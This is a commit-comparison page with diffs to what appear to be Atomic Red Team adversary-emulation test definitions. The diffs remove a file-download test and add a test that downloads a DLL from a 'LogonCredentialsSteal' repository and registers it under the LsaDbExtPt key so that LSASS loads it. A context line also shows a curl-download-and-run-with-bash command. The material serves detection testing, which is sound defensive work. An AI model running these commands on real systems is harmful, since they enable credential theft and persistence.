Compare commits
4 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 7d666a9a7c | |||
| f3eea30be3 | |||
| 2154c25000 | |||
| ee6dd2edd5 |
@@ -734,42 +734,4 @@ atomic_tests:
|
||||
command: |
|
||||
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
|
||||
cleanup_command: |
|
||||
del #{payload_name}
|
||||
name: sh
|
||||
- name: Nimgrab - Transfer Files
|
||||
auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
|
||||
description: |
|
||||
Use nimgrab.exe to download a file from the web.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
remote_file:
|
||||
description: URL of file to copy
|
||||
type: Url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
|
||||
local_path:
|
||||
description: Local path to place file
|
||||
type: Path
|
||||
default: Atomic-license.txt
|
||||
destination_path:
|
||||
description: Destination path to file
|
||||
type: Path
|
||||
default: $env:TEMP\Atomic-license.txt
|
||||
executor:
|
||||
command: |
|
||||
cmd /c nimgrab.exe #{remote_file} #{local_path}
|
||||
cleanup_command: |
|
||||
del #{local_path} >nul 2>&1
|
||||
name: command_prompt
|
||||
dependencies:
|
||||
- description: |
|
||||
NimGrab must be installed on system.
|
||||
prereq_command: |
|
||||
if (Test-Path "$env:temp\nimgrab.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
|
||||
Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim
|
||||
Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{destination_path}
|
||||
Remove-Item $env:temp\nim
|
||||
Remove-Item $env:temp\nim.zip
|
||||
|
||||
del #{payload_name}
|
||||
@@ -0,0 +1,34 @@
|
||||
attack_technique: T1547.008
|
||||
display_name: 'Boot or Logon Autostart Execution: LSASS Driver'
|
||||
atomic_tests:
|
||||
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
|
||||
description: |
|
||||
The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS.
|
||||
|
||||
Upon execution, the registry key will be modified and a value will contain the path to the DLL.
|
||||
Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
|
||||
Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
dll_path:
|
||||
description: Module to be loaded into LSASS
|
||||
type: Path
|
||||
default: '$env:TEMP\lsass_lib.dll'
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
lsass_lib.dll must exist on disk at specified location (#{dll_path})
|
||||
prereq_command: |
|
||||
if (Test-Path #{dll_path}) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/master/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}"
|
||||
executor:
|
||||
command: |
|
||||
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS" -Name "LsaDbExtPt" -ErrorAction Ignore | Out-Null
|
||||
Remove-Item $env:TEMP\lsass_lib.dll -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
Reference in New Issue
Block a user